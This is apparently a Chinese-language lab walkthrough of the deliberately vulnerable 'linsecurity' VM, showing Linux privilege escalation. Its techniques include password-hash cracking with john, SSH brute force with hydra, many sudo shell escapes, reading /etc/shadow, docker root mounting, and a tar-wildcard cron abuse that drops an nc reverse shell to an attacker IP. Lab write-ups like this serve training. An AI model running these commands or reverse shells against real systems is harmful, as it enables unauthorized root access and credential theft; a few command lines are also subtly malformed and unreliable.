GTFOBins<\/a>\uff0c\u6709\u5f88\u591alinux\u6743\u9650\u63d0\u5347\u7684\u65b9\u6cd5\uff01\uff01\uff01\uff01<\/p>\n\/etc\/passwd(bob and peter)<\/h3>\n
\u76f4\u63a5\u8bfb\u53d6\/etc\/passwd<\/code>\uff1a<\/p>\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\nsyslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\nmessagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin \n_apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin \nlxd:x:105:65534::\/var\/lib\/lxd\/:\/bin\/false\nuuidd:x:106:110::\/run\/uuidd:\/usr\/sbin\/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nlandscape:x:108:112::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:109:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\nbob:x:1000:1004:bob:\/home\/bob:\/bin\/bash\nstatd:x:111:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\npeter:x:1001:1005:,,,:\/home\/peter:\/bin\/bash\ninsecurity:AzER3pBZh6WZE:0:0::\/:\/bin\/sh \u9ad8\u6743\u9650\u7528\u6237\u4e14\u6709\u5bc6\u7801hash\u503c\nsusan:x:1002:1006:,,,:\/home\/susan:\/bin\/rbash<\/code><\/pre>\n![\"image-20240224215948836\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n
<\/div><\/p>\n
\u6216\u8005 kali \u4e00\u7ad9\u5230\u5e95\uff1a<\/p>\n
echo AzER3pBZh6WZE > hash | john hash --wordlist = \/usr\/share\/wordlists\/rockyou.txt <\/code><\/pre>\n<\/div><\/p>\n
\u5f97\u5230\u5bc6\u7801\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
insecurity\nP@ssw0rd!<\/code><\/pre>\n<\/div><\/p>\n
\u7206\u7834\u51fa bob \u7528\u6237\u518d\u63d0\u6743(peter)<\/h3>\ncat \/etc\/passwd\n# \u627e\u5230\u4e00\u4e9b\u7528\u6237\u540d\u4e22\u8fdb\u53bb\u7206\u7834\uff0c\u8fd9\u91cc\u76f4\u63a5\u653e\u5165bob\u548csusan\necho -e "bob\\nsusan" > flag.txt\nhydra -L flag.txt -P \/usr\/share\/seclists\/Passwords\/500-worst-passwords.txt 192.168.244.129 ssh -t 4<\/code><\/pre>\n<\/div><\/p>\n
ssh\u8fde\u63a5\u4e00\u4e0b\uff0c\u4f7f\u7528\u6700\u7b80\u5355\u7684\u63d0\u6743\uff1a<\/p>\n
<\/div><\/p>\n
strace(peter) (NFS privilege escalation)<\/h3>\n
\u5148\u67e5\u770b\u4e00\u4e0bsudo -l<\/code>\uff1a<\/p>\n\u68c0\u7d22\u4e00\u4e0b\u76f8\u5173\u63d0\u6743\u65b9\u6cd5\uff1asudo strace -o \/dev\/null \/bin\/sh<\/code><\/p>\n<\/div><\/p>\n
sudo -l<\/h3>\n
\u5148\u4f7f\u7528sudo -l<\/code>\u67e5\u770b\u4e00\u4e0b\u57fa\u7840\u4fe1\u606f\uff1a<\/p>\nMatching Defaults entries for bob on linsecurity:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser bob may run the following commands on linsecurity:\n (ALL) \/bin\/ash, \/usr\/bin\/awk, \/bin\/bash, \/bin\/sh, \/bin\/csh, \/usr\/bin\/curl, \/bin\/dash, \/bin\/ed, \/usr\/bin\/env, \/usr\/bin\/expect, \/usr\/bin\/find, \/usr\/bin\/ftp, \/usr\/bin\/less, \/usr\/bin\/man,\n \/bin\/more, \/usr\/bin\/scp, \/usr\/bin\/socat, \/usr\/bin\/ssh, \/usr\/bin\/vi, \/usr\/bin\/zsh, \/usr\/bin\/pico, \/usr\/bin\/rvim, \/usr\/bin\/perl, \/usr\/bin\/tclsh, \/usr\/bin\/git, \/usr\/bin\/script, \/usr\/bin\/scp<\/code><\/pre>\nash(bob)<\/h3>\nsudo ash<\/code><\/pre>\n<\/div><\/p>\n
awk(bob)<\/h3>\nsudo awk 'BEGIN {system("\/bin\/sh")}'<\/code><\/pre>\n<\/div><\/p>\n
bash(bob)<\/h3>\nsudo bash<\/code><\/pre>\n<\/div><\/p>\n
csh(bob)<\/h3>\nsudo csh<\/code><\/pre>\n<\/div><\/p>\n
curl(bob)<\/h3>\nsudo curl file:\/\/\/etc\/shadow<\/code><\/pre>\nroot:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2\/6K\/UU5wLobTSz\/Pw5\/ILvXgq9NibQ0\/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::\ndaemon:*:17647:0:99999:7:::\nbin:*:17647:0:99999:7:::\nsys:*:17647:0:99999:7:::\nsync:*:17647:0:99999:7:::\ngames:*:17647:0:99999:7:::\nman:*:17647:0:99999:7:::\nlp:*:17647:0:99999:7:::\nmail:*:17647:0:99999:7:::\nnews:*:17647:0:99999:7:::\nuucp:*:17647:0:99999:7:::\nproxy:*:17647:0:99999:7:::\nwww-data:*:17647:0:99999:7:::\nbackup:*:17647:0:99999:7:::\nlist:*:17647:0:99999:7:::\nirc:*:17647:0:99999:7:::\ngnats:*:17647:0:99999:7:::\nnobody:*:17647:0:99999:7:::\nsystemd-network:*:17647:0:99999:7:::\nsystemd-resolve:*:17647:0:99999:7:::\nsyslog:*:17647:0:99999:7:::\nmessagebus:*:17647:0:99999:7:::\n_apt:*:17647:0:99999:7:::\nlxd:*:17647:0:99999:7:::\nuuidd:*:17647:0:99999:7:::\ndnsmasq:*:17647:0:99999:7:::\nlandscape:*:17647:0:99999:7:::\npollinate:*:17647:0:99999:7:::\nsshd:*:17647:0:99999:7:::\nbob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::\nstatd:*:17721:0:99999:7:::\npeter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A\/x7GhQQvJ0RoYwG4Jxj\/6R58SJddU2X\/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::\nsusan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN\/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9\/SR\/:17721:0:99999:7:::<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0broot<\/code>\u5bc6\u7801\uff1a<\/p>\nroot:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2\/6K\/UU5wLobTSz\/Pw5\/ILvXgq9NibQ0\/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::<\/code><\/pre>\n\u7528\u6237\u540d<\/strong>\uff1a\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\u662f "root"\uff0c\u8868\u793a\u8fd9\u662f root \u7528\u6237\u7684\u6761\u76ee\u3002<\/p>\n\u5bc6\u7801\u54c8\u5e0c<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u4fdd\u5b58\u4e86\u7528\u6237\u7684\u5bc6\u7801\u54c8\u5e0c\u503c\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5bc6\u7801\u54c8\u5e0c\u662f $6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2\/6K\/UU5wLobTSz\/Pw5\/ILvXgq9NibQ0\/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1<\/code>\uff0c\u5b83\u662f\u7ecf\u8fc7\u52a0\u5bc6\u5904\u7406\u7684\u5bc6\u7801\u3002<\/p>\n\u4e0a\u6b21\u4fee\u6539\u65e5\u671f<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u8868\u793a\u81ea1970\u5e741\u67081\u65e5\u8d77\uff0c\u8ddd\u79bb\u4e0a\u6b21\u4fee\u6539\u5bc6\u7801\u7684\u5929\u6570\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u662f "17721" \u5929\u3002<\/p>\n\u5bc6\u7801\u5230\u671f\u524d\u8b66\u544a\u5929\u6570<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u8868\u793a\u5bc6\u7801\u8fc7\u671f\u524d\u7684\u8b66\u544a\u5929\u6570\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u662f "0" \u5929\u3002<\/p>\n\u5bc6\u7801\u8fc7\u671f\u5929\u6570<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u8868\u793a\u5bc6\u7801\u7684\u6700\u5927\u6709\u6548\u671f\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u662f "99999" \u5929\uff0c\u8868\u793a\u5bc6\u7801\u6c38\u4e0d\u8fc7\u671f\u3002<\/p>\n\u5bc6\u7801\u8fc7\u671f\u65e5\u671f<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u8868\u793a\u81ea1970\u5e741\u67081\u65e5\u8d77\uff0c\u5bc6\u7801\u8fc7\u671f\u7684\u7edd\u5bf9\u65e5\u671f\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u662f "7" \u5929\uff0c\u8868\u793a\u5bc6\u7801\u6c38\u4e0d\u8fc7\u671f\u3002<\/p>\n\u8d26\u6237\u5931\u6548\u65e5\u671f<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u8868\u793a\u81ea1970\u5e741\u67081\u65e5\u8d77\uff0c\u8d26\u6237\u5931\u6548\u7684\u7edd\u5bf9\u65e5\u671f\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u662f\u7a7a\u7684\uff0c\u8868\u793a\u8d26\u6237\u6c38\u4e0d\u5931\u6548\u3002<\/p>\n\u4fdd\u7559\u5b57\u6bb5<\/strong>\uff1a\u8fd9\u4e9b\u5b57\u6bb5\u76ee\u524d\u6ca1\u6709\u88ab\u4f7f\u7528\u3002<\/p>\ndash(bob)<\/h3>\nsudo dash<\/code><\/pre>\n<\/div><\/p>\n
ed(bob)<\/h3>\nsudo ed\n!\/bin\/sh<\/code><\/pre>\n<\/div><\/p>\n
env(bob)<\/h3>\nsudo env \/bin\/sh<\/code><\/pre>\n<\/div><\/p>\n
expect(bob)<\/h3>\n\nexpect\u662f\u4e00\u4e2a\u81ea\u52a8\u5316\u4ea4\u4e92\u5957\u4ef6\uff0c\u4e3b\u8981\u5e94\u7528\u4e8e\u6267\u884c\u547d\u4ee4\u548c\u7a0b\u5e8f\u65f6\uff0c\u7cfb\u7edf\u4ee5\u4ea4\u4e92\u5f62\u5f0f\u8981\u6c42\u8f93\u5165\u6307\u5b9a\u5b57\u7b26\u4e32\uff0c\u5b9e\u73b0\u4ea4\u4e92\u901a\u4fe1\u3002<\/p>\n<\/blockquote>\n
sudo expect -c 'spawn \/bin\/sh;interact'<\/code><\/pre>\n<\/div><\/p>\n
find(bob)<\/h3>\nsudo find . -exec \/bin\/sh \\; -quit\n# -quit\u524d\u9762\u7684\u7a7a\u683c\uff01\uff01\uff01<\/code><\/pre>\n<\/div><\/p>\n
ftp(bob)<\/h3>\nsudo ftp\n!\/bin\/sh<\/code><\/pre>\n<\/div><\/p>\n
Less(bob)<\/h3>\n\nless \u4e0e more \u7c7b\u4f3c\uff0c\u4f46\u4f7f\u7528 less \u53ef\u4ee5\u968f\u610f\u6d4f\u89c8\u6587\u4ef6\uff0c\u800c more \u4ec5\u80fd\u5411\u524d\u79fb\u52a8\uff0c\u5374\u4e0d\u80fd\u5411\u540e\u79fb\u52a8\uff0c\u800c\u4e14 less \u5728\u67e5\u770b\u4e4b\u524d\u4e0d\u4f1a\u52a0\u8f7d\u6574\u4e2a\u6587\u4ef6\u3002<\/p>\n<\/blockquote>\n
sudo less \/etc\/passwd\n!\/bin\/sh<\/code><\/pre>\n<\/div><\/p>\n
Man(bob)<\/h3>\n\nLinux\u63d0\u4f9b\u4e86\u4e30\u5bcc\u7684\u5e2e\u52a9\u624b\u518c\uff0c\u5f53\u4f60\u9700\u8981\u67e5\u770b\u67d0\u4e2a\u547d\u4ee4\u7684\u53c2\u6570\u65f6\u4e0d\u5fc5\u5230\u5904\u4e0a\u7f51\u67e5\u627e\uff0c\u53ea\u8981man\u4e00\u4e0b\u5373\u53ef\u3002\u53ef\u4ee5\u4f7f\u7528man man \u67e5\u770bman\u7684\u4f7f\u7528\u65b9\u6cd5\u3002<\/p>\n<\/blockquote>\n
sudo man man\n!\/bin\/sh<\/code><\/pre>\n<\/div><\/p>\n
<\/div><\/p>\n
More(bob)<\/h3>\n\nLinux more \u547d\u4ee4\u7c7b\u4f3c cat \uff0c\u4e0d\u8fc7\u4f1a\u4ee5\u4e00\u9875\u4e00\u9875\u7684\u5f62\u5f0f\u663e\u793a\uff0c\u66f4\u65b9\u4fbf\u4f7f\u7528\u8005\u9010\u9875\u9605\u8bfb\uff0c\u800c\u6700\u57fa\u672c\u7684\u6307\u4ee4\u5c31\u662f\u6309\u7a7a\u767d\u952e\uff08space\uff09\u5c31\u5f80\u4e0b\u4e00\u9875\u663e\u793a\uff0c\u6309 b \u952e\u5c31\u4f1a\u5f80\u56de\uff08back\uff09\u4e00\u9875\u663e\u793a\uff0c\u800c\u4e14\u8fd8\u6709\u641c\u5bfb\u5b57\u4e32\u7684\u529f\u80fd\uff08\u4e0e vi \u76f8\u4f3c\uff09\uff0c\u4f7f\u7528\u4e2d\u7684\u8bf4\u660e\u6587\u4ef6\uff0c\u8bf7\u6309 h \u3002<\/p>\n<\/blockquote>\n
TERM = sudo more \/etc\/profile\n!\/bin\/sh<\/code><\/pre>\n<\/div><\/p>\n
Scp(bob)<\/h3>\n\nscp \u662f secure copy \u7684\u7f29\u5199, scp \u662f linux \u7cfb\u7edf\u4e0b\u57fa\u4e8e ssh \u767b\u9646\u8fdb\u884c\u5b89\u5168\u7684\u8fdc\u7a0b\u6587\u4ef6\u62f7\u8d1d\u547d\u4ee4\u3002<\/p>\n
scp \u662f\u52a0\u5bc6\u7684\uff0crcp \u662f\u4e0d\u52a0\u5bc6\u7684\uff0cscp \u662f rcp \u7684\u52a0\u5f3a\u7248\u3002<\/p>\n<\/blockquote>\n
TF=$(mktemp)\necho 'sh 0<&2 1>&2' > $TF\nchmod +x "$TF"\nsudo scp -S $TF x y:<\/code><\/pre>\n<\/div><\/p>\n
socat(bob)<\/h3>\n
socat<\/code>\u662f\u4e00\u4e2a\u591a\u529f\u80fd\u7684\u7f51\u7edc\u5de5\u5177\uff0c\u540d\u5b57\u6765\u7531\u662fSocket CAT<\/code>\uff0c\u53ef\u4ee5\u770b\u4f5c\u662fnetcat<\/code>\u7684\u52a0\u5f3a\u7248\u3002<\/p>\n<\/div><\/p>\n
\u4e5f\u53ef\u4ee5\uff1a<\/p>\n
sudo socat TCP-LISTEN:8888,reuseaddr,fork EXEC:\/bin\/sh,pty,stderr,setsid,sigint,sane\nsocat FILE:`tty`,raw,echo=0 TCP:127.0.0.1:8888<\/code><\/pre>\n<\/div><\/p>\n
ssh(bob)<\/h3>\nsudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x<\/code><\/pre>\n<\/div><\/p>\n
vi(bob)<\/h3>\nsudo vi -c ':!\/bin\/sh' \/dev\/null<\/code><\/pre>\n<\/div><\/p>\n
zsh(bob)<\/h3>\nsudo zsh<\/code><\/pre>\n<\/div><\/p>\n
pico(bob)<\/h3>\n\nLinux pico\u547d\u4ee4\u7528\u4e8e\u7f16\u8f91\u6587\u5b57\u6587\u4ef6\u3002<\/p>\n
pico\u662f\u4e2a\u7b80\u5355\u6613\u7528\u3001\u4ee5\u663e\u793a\u5bfc\u5411\u4e3a\u4e3b\u7684\u6587\u5b57\u7f16\u8f91\u7a0b\u5e8f\uff0c\u5b83\u4f34\u968f\u7740\u5904\u7406\u7535\u5b50\u90ae\u4ef6\u548c\u65b0\u95fb\u7ec4\u7684\u7a0b\u5e8fpine\u800c\u6765\u3002<\/p>\n<\/blockquote>\n
shell1<\/h4>\npico\n^R^X # ctrl+R ctrl+X\nreset; sh 1>&0 2>&0<\/code><\/pre>\n<\/div><\/p>\n
\u8fd9\u91cc\u9700\u8981sudo<\/code>\u4e00\u4e0b\uff1a<\/p>\nsudo pico\n^R^X # ctrl+R ctrl+X\nreset; sh 1>&0 2>&0<\/code><\/pre>\n<\/div><\/p>\n
shell2<\/h4>\nsudo pico -s \/bin\/sh\n\/bin\/sh\n^T # ctrl+T<\/code><\/pre>\n<\/div>
\n
<\/div><\/p>\n
rvim(bob)<\/h3>\n\n\u8fd9\u9700\u8981 rvim \u4f7f\u7528Python\u652f\u6301\u8fdb\u884c\u7f16\u8bd1\u3002\u524d\u7f6e\uff1apy3\u4e3aPython3<\/p>\n<\/blockquote>\n
sudo rvim -c ':python3 import os; os.execl("\/bin\/sh", "sh", "-c", "reset; exec sh")'<\/code><\/pre>\n<\/div><\/p>\n
perl(bob)<\/h3>\nsudo perl -e 'exec "\/bin\/sh";'<\/code><\/pre>\n<\/div><\/p>\n
tclsh(bob)<\/h3>\n
tclsh<\/code>\u662fTcl\uff08Tool Command Language\uff09\u7684\u89e3\u91ca\u5668\uff0c\u7528\u4e8e\u6267\u884c Tcl \u811a\u672c\u3002Tcl\u662f\u4e00\u79cd\u901a\u7528\u7684\u811a\u672c\u8bed\u8a00\uff0c\u5b83\u88ab\u8bbe\u8ba1\u7528\u6765\u7f16\u5199\u5404\u79cd\u7c7b\u578b\u7684\u7a0b\u5e8f\uff0c\u5305\u62ec\u7cfb\u7edf\u7ba1\u7406\u811a\u672c\u3001\u56fe\u5f62\u754c\u9762\u7a0b\u5e8f\u3001\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u7b49\u3002Tcl\u811a\u672c\u53ef\u4ee5\u5728\u5404\u79cd\u64cd\u4f5c\u7cfb\u7edf\u4e0a\u8fd0\u884c\uff0c\u5305\u62ecLinux\u3001Unix\u3001Windows\u7b49\u3002<\/p>\nsudo tclsh\nexec \/bin\/sh <@stdin >@stdout 2>@stderr<\/code><\/pre>\n<\/div><\/p>\n
git(bob)<\/h3>\nsudo git -p help config\n!\/bin\/sh<\/code><\/pre>\n<\/div><\/p>\n
script(bob)<\/h3>\nsudo script -q \/dev\/null<\/code><\/pre>\n<\/div><\/p>\n
\u5b9a\u65f6\u4efb\u52a1\u63d0\u6743(bob)<\/h3>\ncat \/etc\/crontab\ncat \/etc\/cron.daily\/backup\necho "mkfifo \/tmp\/sfnirht; nc 192.168.244.128 1234 0<\/tmp\/sfnirht | \/bin\/sh >\/tmp\/sfnirht 2>&1; rm \/tmp\/sfnirht" > shell.sh && chmod +x shell.sh\necho > "--checkpoint-action=exec=sh shell.sh"\necho > "--checkpoint=1"\n\n# kali\nmsfvenom -p cmd\/unix\/reverse_netcat lhost=192.168.244.128 lport=1234\n# mkfifo \/tmp\/sfnirht; nc 192.168.244.128 1234 0<\/tmp\/sfnirht | \/bin\/sh >\/tmp\/sfnirht 2>&1; rm \/tmp\/sfnirht<\/code><\/pre>\n<\/div><\/p>\n
docker\u63d0\u6743(peter)<\/h3>\ngroups\npeter docker<\/code><\/pre>\ndocker run -v \/:\/mnt --rm -it alpine chroot \/mnt bash<\/code><\/pre>\n<\/div><\/p>\n
\u9690\u85cf\u6587\u4ef6+SID\u63d0\u6743\uff08bob->susan->root\uff09<\/h3>\n
\u5bfb\u627e\u4e00\u4e0b\u9690\u85cf\u6587\u4ef6\uff0c\u770b\u770b\u6709\u6ca1\u6709\u53ef\u4ee5\u5229\u7528\u7684\uff1a<\/p>\n
find . -type f -name ".*"\n# ls -alR \/home<\/code><\/pre>\n<\/div><\/p>\n
\u770b\u5230\u4e00\u4e2a.secret<\/code>\u53ef\u80fd\u6709\u7528\uff0c\u770b\u4e00\u4e0b\u662f\u5565\uff0c\u5c1d\u8bd5\u767b\u5f55\u5230susan\u4e0a\u53bb\uff1a<\/p>\n<\/div><\/p>\n
\u6210\u529f\uff01\uff01\uff01\uff01<\/p>\n
\u67e5\u770b\u4e00\u4e0bSID<\/code>\u7a0b\u5e8f\u6709\u54ea\u4e9b\uff1a<\/p>\nfind \/ -perm -4000 -type f -exec ls -al {} \\; 2>\/dev\/null<\/code><\/pre>\n-rwsr-xr-x 1 root root 40152 Nov 30 2017 \/snap\/core\/4917\/bin\/mount\n-rwsr-xr-x 1 root root 44168 May 7 2014 \/snap\/core\/4917\/bin\/ping\n-rwsr-xr-x 1 root root 44680 May 7 2014 \/snap\/core\/4917\/bin\/ping6\n-rwsr-xr-x 1 root root 40128 May 17 2017 \/snap\/core\/4917\/bin\/su\n-rwsr-xr-x 1 root root 27608 Nov 30 2017 \/snap\/core\/4917\/bin\/umount\n-rwsr-xr-x 1 root root 71824 May 17 2017 \/snap\/core\/4917\/usr\/bin\/chfn\n-rwsr-xr-x 1 root root 40432 May 17 2017 \/snap\/core\/4917\/usr\/bin\/chsh\n-rwsr-xr-x 1 root root 75304 May 17 2017 \/snap\/core\/4917\/usr\/bin\/gpasswd\n-rwsr-xr-x 1 root root 39904 May 17 2017 \/snap\/core\/4917\/usr\/bin\/newgrp\n-rwsr-xr-x 1 root root 54256 May 17 2017 \/snap\/core\/4917\/usr\/bin\/passwd\n-rwsr-xr-x 1 root root 136808 Jul 4 2017 \/snap\/core\/4917\/usr\/bin\/sudo\n-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12 2017 \/snap\/core\/4917\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n-rwsr-xr-x 1 root root 428240 Jan 18 2018 \/snap\/core\/4917\/usr\/lib\/openssh\/ssh-keysign\n-rwsr-sr-x 1 root root 98440 Jun 21 2018 \/snap\/core\/4917\/usr\/lib\/snapd\/snap-confine\n-rwsr-xr-- 1 root dip 390888 Jan 29 2016 \/snap\/core\/4917\/usr\/sbin\/pppd\n-rwsr-xr-x 1 root root 40152 Nov 30 2017 \/snap\/core\/4486\/bin\/mount\n-rwsr-xr-x 1 root root 44168 May 7 2014 \/snap\/core\/4486\/bin\/ping\n-rwsr-xr-x 1 root root 44680 May 7 2014 \/snap\/core\/4486\/bin\/ping6\n-rwsr-xr-x 1 root root 40128 May 17 2017 \/snap\/core\/4486\/bin\/su\n-rwsr-xr-x 1 root root 27608 Nov 30 2017 \/snap\/core\/4486\/bin\/umount\n-rwsr-xr-x 1 root root 71824 May 17 2017 \/snap\/core\/4486\/usr\/bin\/chfn\n-rwsr-xr-x 1 root root 40432 May 17 2017 \/snap\/core\/4486\/usr\/bin\/chsh\n-rwsr-xr-x 1 root root 75304 May 17 2017 \/snap\/core\/4486\/usr\/bin\/gpasswd\n-rwsr-xr-x 1 root root 39904 May 17 2017 \/snap\/core\/4486\/usr\/bin\/newgrp\n-rwsr-xr-x 1 root root 54256 May 17 2017 \/snap\/core\/4486\/usr\/bin\/passwd\n-rwsr-xr-x 1 root root 136808 Jul 4 2017 \/snap\/core\/4486\/usr\/bin\/sudo\n-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12 2017 \/snap\/core\/4486\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n-rwsr-xr-x 1 root root 428240 Jan 18 2018 \/snap\/core\/4486\/usr\/lib\/openssh\/ssh-keysign\n-rwsr-sr-x 1 root root 94344 Apr 16 2018 \/snap\/core\/4486\/usr\/lib\/snapd\/snap-confine\n-rwsr-xr-- 1 root dip 390888 Jan 29 2016 \/snap\/core\/4486\/usr\/sbin\/pppd\n-rwsr-xr-x 1 root root 64424 Mar 9 2017 \/bin\/ping\n-rwsr-xr-x 1 root root 30800 Aug 11 2016 \/bin\/fusermount\n-rwsr-xr-x 1 root root 26696 May 16 2018 \/bin\/umount\n-rwsr-xr-x 1 root root 146128 Nov 30 2017 \/bin\/ntfs-3g\n-rwsr-xr-x 1 root root 44664 Jan 25 2018 \/bin\/su\n-rwsr-xr-x 1 root root 43088 May 16 2018 \/bin\/mount\n-rwsr-xr-x 1 root root 22520 Mar 27 2018 \/usr\/bin\/pkexec\n-rwsr-xr-x 1 root root 18640 Oct 27 2016 \/usr\/bin\/netkit-rlogin\n-rwsr-x--- 1 root itservices 18552 Apr 10 2018 \/usr\/bin\/xxd -->xxd \u547d\u4ee4\u7528\u4e8e\u4f7f\u7528\u4e8c\u8fdb\u5236\u6216\u5341\u516d\u8fdb\u5236\u683c\u5f0f\u663e\u793a\u6587\u4ef6\u5185\u5bb9\n-rwsr-xr-x 1 root root 37136 Jan 25 2018 \/usr\/bin\/newgidmap\n-rwsr-xr-x 1 root root 40344 Jan 25 2018 \/usr\/bin\/newgrp\n-rwsr-xr-x 1 root root 149080 Jan 18 2018 \/usr\/bin\/sudo\n-rwsr-xr-x 1 root root 22728 Oct 27 2016 \/usr\/bin\/netkit-rcp\n-rwsr-xr-x 1 root root 76496 Jan 25 2018 \/usr\/bin\/chfn\n-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 \/usr\/bin\/at\n-rwsr-xr-x 1 root root 75824 Jan 25 2018 \/usr\/bin\/gpasswd\n-rwsr-xr-x 1 root root 44528 Jan 25 2018 \/usr\/bin\/chsh\n-rwsr-xr-x 1 root root 18448 Mar 9 2017 \/usr\/bin\/traceroute6.iputils\n-rwsr-xr-x 1 root root 37136 Jan 25 2018 \/usr\/bin\/newuidmap\n-rwsr-xr-x 1 root root 14504 Oct 27 2016 \/usr\/bin\/netkit-rsh\n-rwsr-sr-x 1 root root 30800 May 16 2018 \/usr\/bin\/taskset\n-rwsr-xr-x 1 root root 59640 Jan 25 2018 \/usr\/bin\/passwd\n-rwsr-xr-x 1 root root 10232 Mar 28 2017 \/usr\/lib\/eject\/dmcrypt-get-device\n-rwsr-xr-- 1 root messagebus 42992 Nov 15 2017 \/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n-rwsr-xr-x 1 root root 80056 Jun 5 2018 \/usr\/lib\/x86_64-linux-gnu\/lxc\/lxc-user-nic\n-rwsr-xr-x 1 root root 436552 Feb 10 2018 \/usr\/lib\/openssh\/ssh-keysign\n-rwsr-xr-x 1 root root 14328 Mar 27 2018 \/usr\/lib\/policykit-1\/polkit-agent-helper-1\n-rwsr-sr-x 1 root root 101208 May 16 2018 \/usr\/lib\/snapd\/snap-confine\n-rwsr-xr-x 1 root root 113336 Jan 16 2018 \/sbin\/mount.nfs<\/code><\/pre>\n\u4f7f\u7528xxd<\/code>\u547d\u4ee4\u8bfb\u53d6shadow<\/code>\uff1a<\/p>\nxxd \/etc\/shadow | xxd -r<\/code><\/pre>\n\u5c1d\u8bd5\u7834\u8bd1root<\/code>\u7684\u5bc6\u7801\uff1a<\/p>\n# kali\necho 'root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2\/6K\/UU5wLobTSz\/Pw5\/ILvXgq9NibQ0\/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::' > flag.txt \n# \u53ea\u80fd\u662f\u5355\u5f15\u53f7\uff0c\u53cc\u5f15\u53f7\u4e0d\u884c\uff01\uff01\uff01\uff01\njohn flag.txt --wordlist=\/usr\/share\/wordlists\/rockyou.txt <\/code><\/pre>\n<\/div><\/p>\n
\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n
\u6210\u529f\uff01\uff01\uff01\uff01<\/p>\n
SUID\u63d0\u6743(bob and peter)<\/h3>\n
